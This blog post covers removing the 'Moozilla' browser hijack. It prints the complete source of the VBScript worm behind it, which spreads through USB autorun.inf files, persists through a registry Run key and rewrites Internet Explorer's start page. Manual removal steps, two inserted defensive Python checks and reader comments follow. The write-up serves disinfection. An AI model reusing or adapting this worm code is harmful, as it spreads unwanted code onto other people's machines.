Hacked by Moozilla

Recently, I have seen many instances of this browser hijack on many machines. People are going nuts with this infection, and here I am nearing the solution to wipe it off the machines which are infected.

Browser and Explorer Hijack?

Yes. IE gets hijacked after the infection, and whenever IE is opened, the home page is hijacked and re-routed to http://www.lastchaos.in.th/.

Apart from the browser hijack, it also hijacks Windows Explorer. On an infected machine, a left double-click will not open the drives in Windows Explorer; right-clicking and choosing Open or Explore will. So it hijacks both IE and Windows Explorer.

File and Location

The file that does this hack is named IISDLL.dll.vbs, and it is located at C:\IISDLL.dll.vbs and C:\Windows\IISDLL.dll.vbs.

The file has the read-only attribute set, so it cannot be changed as it is. The attribute has to be cleared before any changes can be made to the file.

Mode of Infection?

Going by the script, the mode of infection is through flash or thumb drives. Be careful with yours, as machines are rapidly being infected with this file.

Solution?

Have tried cleaning the machines with all AV software I could think of and nothing seems to work. I am planning to write a counter script to nullify this one. Till then watch this space for a proper solution.

Where is the script?

If your machine is infected, you can locate the file, right-click it and edit it with Notepad. If your machine is not infected but you are curious to know what the script does, see below.

IISDLL.dll.vbs

‘My name is Sukorn test script for bootsecter
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe IISDLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\IISDLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by MOOzilla”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.lastchaos.in.th/
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

Update

What does this Moozilla do?

The Moozilla hijack is not a malicious program meant to damage the machine. It is a small Windows VBScript that hijacks the start page of your browser to some Thailand site. The autorun.inf file gets copied to the flash drive from an infected machine. When the flash drive is inserted in another machine, the autoplay feature activates the autorun.inf and copies the IISDLL.dll.vbs and autorun.inf files to all the drives except A:\. Maybe the script writer likes floppies very much. :lol:
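The propagation described above leaves two things in a drive's root: an autorun.inf whose launch entry starts a script host, and the script copy itself. The following is an added example (not code from the original post) that checks a drive root for both; the function names and the lists of script hosts and script extensions are assumptions chosen for illustration.

```python
import os

SCRIPT_HOSTS = ("wscript", "cscript")                   # assumed list
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")   # assumed list
KNOWN_NAME = "iisdll.dll.vbs"  # file name used by the script listed above
# The autorun.inf content the listed script writes (its `atr` variable)
SAMPLE = "[autorun]\r\nshellexecute=wscript.exe IISDLL.dll.vbs"


def parse_autorun(text):
    """Return {key: value} for the [autorun] section, keys lower-cased."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def autorun_findings(text):
    """List launch entries that start a script host or a script file."""
    findings = []
    for key, value in parse_autorun(text).items():
        launches = key in ("open", "shellexecute") or key.endswith("\\command")
        low = value.lower()
        scripted = any(h in low for h in SCRIPT_HOSTS) or any(
            w.strip('"').endswith(SCRIPT_EXTS) for w in low.split())
        if launches and scripted:
            findings.append(f"{key}={value}")
    return findings


def scan_root(root):
    """Check one drive root (for example a mounted USB stick)."""
    report = {"autorun": [], "script": None}
    for name in os.listdir(root):
        path = os.path.join(root, name)
        if name.lower() == "autorun.inf" and os.path.isfile(path):
            with open(path, "r", errors="replace") as fh:
                report["autorun"] = autorun_findings(fh.read())
        elif name.lower() == KNOWN_NAME:
            report["script"] = path
    return report


if __name__ == "__main__":
    print(autorun_findings(SAMPLE))
```

Point `scan_root` at the stick's mount point on a host where AutoRun does not fire; `os.listdir` returns the files even though the script marks its copies hidden and system.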

Have removed the hacked by moozilla browser hijacker off my machine. :razz:
Here are the manual removal instructions. Watch this space for an automated script to remove the hijack off the machine.

Disclaimer

The solution given here worked for me and it may or may not work for you. In no way am I responsible if anything happens to your machine after following the steps given below. If the solution helped you, leave a comment below, which will make me smile and add a day to my lifetime. :razz: You can leave a comment if it did not work, but show some courtesy. I don’t want blood oozing out of my ears after reading your comments. :wink:

Manual Removal Instructions for Moozilla browser hijack

1. Start Windows in Safe Mode. Read the instructions on how to start Windows in Safe Mode.

2. Take out any USB storage devices that are plugged in, such as flash or thumb drives.

3. Open My Computer and look for the number of drives you have. You may have around 3 to 5 drives apart from A:\ (if you have a floppy drive) or an optical drive (CD or DVD drive).

4. Each drive will be marked by a letter such as E:, F:, etc.

To make the computer show hidden files and folders, click Tools in My Computer, click Folder Options and click View. In the series of check boxes and radio buttons, do the following three things.

a. Click Show hidden files and folders.

b. Uncheck the box Hide extensions for known file types.

c. Uncheck the box Hide Protected Operating system files (Recommended).

5. Click Start and click Run. Type C:\ and hit Enter.

6. Look for the files named autorun.inf and IISDLL.dll.vbs. Select them one by one and press Shift+Delete.

Navigate to the Windows folder under the C:\ drive, look for the same files and Shift+Delete them.

7. In the same way, follow the steps for all the drives listed under My Computer.

8. Click Start and click Run. Type regedit and click OK. This will open the registry editor.

9. Back up the registry before making any changes to it, as changes may have dangerous implications for the machine. Read how to back up the Windows registry.

10. Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Start Page on the right hand side.

Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Window Title on the right hand side.

Navigate to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete MS32DLL on the right hand side.

11. Restart the machine and open IE and Windows Explorer to see that Moozilla is gone. Enjoy! :razz:
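The removal above only holds if the three registry values from step 10 are really gone after the restart. As an added example (not part of the original post), this read-only check reports which of those values still carry the hijack; `leftover_registry_values`, `read_value_winreg` and the tests on the value data are names and assumptions introduced here, and the sample state is constructed.

```python
# Values written by the listed script: (hive, key, value name, test on the data)
IE_MAIN = r"Software\Microsoft\Internet Explorer\Main"
INDICATORS = [
    ("HKLM", r"Software\Microsoft\Windows\CurrentVersion\Run", "MS32DLL",
     lambda data: "iisdll.dll.vbs" in data.lower()),
    ("HKCU", IE_MAIN, "Window Title", lambda data: "moozilla" in data.lower()),
    ("HKCU", IE_MAIN, "Start Page", lambda data: "lastchaos.in.th" in data.lower()),
]


def read_value_winreg(hive, key, name):
    """Read one registry value on Windows; None if the key or value is absent."""
    import winreg  # imported here so the module still loads on other systems
    root = {"HKLM": winreg.HKEY_LOCAL_MACHINE,
            "HKCU": winreg.HKEY_CURRENT_USER}[hive]
    try:
        with winreg.OpenKey(root, key) as handle:
            return str(winreg.QueryValueEx(handle, name)[0])
    except FileNotFoundError:
        return None


def leftover_registry_values(read_value=read_value_winreg):
    """Return [(path, data)] for each value that still carries the hijack."""
    hits = []
    for hive, key, name, is_hijacked in INDICATORS:
        data = read_value(hive, key, name)
        # A Start Page the user has since reset to something else is not a hit
        if data is not None and is_hijacked(data):
            hits.append((f"{hive}\\{key}\\{name}", data))
    return hits


# Constructed sample: state after deleting only the Run value
SAMPLE_STATE = {
    ("HKCU", IE_MAIN, "Window Title"): "Hacked by MOOzilla",
    ("HKCU", IE_MAIN, "Start Page"): "http://www.lastchaos.in.th/",
}

if __name__ == "__main__":
    # On Windows, call leftover_registry_values() with no argument instead
    for path, data in leftover_registry_values(lambda *k: SAMPLE_STATE.get(k)):
        print(path, "=", data)
```

An empty result after the restart means none of the three values is still set to what the script writes; any hit that reappears points to a copy of the script that is still being launched.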


76 Responses to Hacked by Moozilla

  1. Dev says:

    Worked very well thanks for the instructions

  2. Kamahl says:

    If you don’t remove the autorun.inf from the USB, it’ll come back the moment you put it in. Make sure you delete *all* copies of autorun.inf from your computer, USB drives, MP3 players, cameras, etc first, BEFORE running the regedit section.

    @karthick, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.

  3. Kamahl says:

    If you don’t remove the autorun.inf from the USB, it’ll come back the moment you put it in. Make sure you delete *all* copies of autorun.inf from your computer, USB drives, MP3 players, cameras, etc first, BEFORE running the regedit section.

    @kiron, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.

  4. Kamahl says:

    Oh, and it’s an awesome code for what it does…

    *note*, you don’t need to remove the .vbs if you can’t, as long as the autorun is gone.

  5. Tinto says:

    Hi friends,

    Always use right click to open flash drives; it will prevent the autoplay option from executing and keep you free from the IISDLL virus…..

  6. Ranjan says:

    Thanks. It the process of doing this much easier than what it appears to be. It is absolutely safe and hasslefree and Hacked by MOOzilla goes for ever.

  7. Jose p says:

    :shock: Amazing solution !!!!!!!!!!!!!!!!!!!!

  8. k.vini says:

    Simply superb solution.

  9. sunil says:

    Hi Karthick

    I tried with Ur solution which i performed manually but it is still that problem is coming up hacked by MOozilla, what i need to do please reply immediately.
    bye
    Sunil

  10. Gagan says:

    Thanks a ton man… u rock… :mrgreen:

  11. venky says:

    :roll: Hi karthick
    I cant go after your solution aftr the Point no:5.can you provide a flow chart with easy accesss.it will be very helpful.it’s in your hands to make my PC free from moozilla.

  12. venky says:

    Karthick,
    i cant find the file which is(autorun.inf and ISSDLL.dll.vbs.)
    where to find this

  13. Nitin says:

    Hey Brother

    Thanks a lot for the solution provided. It did the miracle

  14. asha says:

    thanks a lot karthick! i was struggling to get rid of this moozilla and finally i got the solution from ur site. it was really very helpful. thank u.

  15. ragul says:

    super super super tq tq tq grt grt grt :lol:

  16. lucky says:

    :lol:
    sir
    u r ginius i respect u do make a help everytime
    u r really good plz send any thing intrested to my email
    again u r good

  17. venky says:

    Hi Karthik,

    How are you i am also having the same problem but i can open the drives with left click.but in IE it shows Hacked by Moozilla.
    Wat is the reason behind.Pls give a solution i got my PC just one month ago.It really terribles me

  18. Jashim says:

    Thanks a lot… :lol:
    But can u tell me how to remove the “Autoplay” from the right-click menu for drives…… :!:

  19. siva says:

    :wink: :wink: hey thnx.it worked but i couldnt delete isdll in c:\windows and there was no file named ms32dll in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Run
    but still im no longer getting redirected.should i do any thing abt it?if so what?

  20. Shruthi says:

    Good work.
    Thanks a Ton.
    Worked for me :grin:

  21. sandesh says:

    thanks,

    it solved my problem

  22. balaji says:

    hi
    thanks :neutral:
    worked for me

  23. Yousuff says:

    Hi Karthick,

    Your solution worked…thanks

    Yousuff

  24. VISHNU says:

    THNKS IT WORKED….U CAN USE UNLOCKER SOFTWARE IF ITS NOT GETTING DELETED….

  25. yhjkkhh says:

    mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm :arrow: m

  26. Amit Jain says:

    :smile: :smile: :smile: :smile:

    Thanks a lot, it really works

    see for how many days

    COuld you please let me know the source from where we get this virus so that we may take care of the same.
